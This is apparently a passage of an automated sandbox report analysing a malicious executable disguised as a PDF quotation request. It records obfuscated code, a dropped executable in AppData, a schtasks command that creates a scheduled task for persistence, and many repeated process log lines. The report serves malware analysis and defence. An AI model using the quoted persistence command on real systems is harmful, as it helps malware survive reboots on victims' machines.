                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, O5KyQCDPn9681CloIh.csHigh entropy of concatenated method names: 'E3ZsRGgE4w', 'nxJsraBc9w', 'EoMsC3tIgn', 'yvksF6mVxW', 'TrVs9kiNNt', 'rF1C5W0AoS', 'Ka3CpdD427', 'k7uCwxpoOV', 'IUbCqTROHb', 'M7kCT4Yba9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, cAQQjuUkVRdVJ9Gdhm.csHigh entropy of concatenated method names: 'G908aZYuIq', 'LMm8OvhH1w', 'wW38UxqFoN', 'k748dnZbc2', 'GCC8IA8mfP', 'TtA8H38IgQ', 'RIb8Pksi9V', 'hUH8NaUmbC', 'U6c8SBybOA', 'BE08jsIfSX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ovs4HF1taliex9VHSE.csHigh entropy of concatenated method names: 'dCtg7C40Dq', 'xKogLPFdDA', 'A18gDguFcN', 'J1RgIOUroY', 'el4gPyepHM', 'WP4gNDymVD', 'nuOgj1Try0', 'Ip0gWQL3gO', 'dulgahnuYa', 'TZogiH8ScD'
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
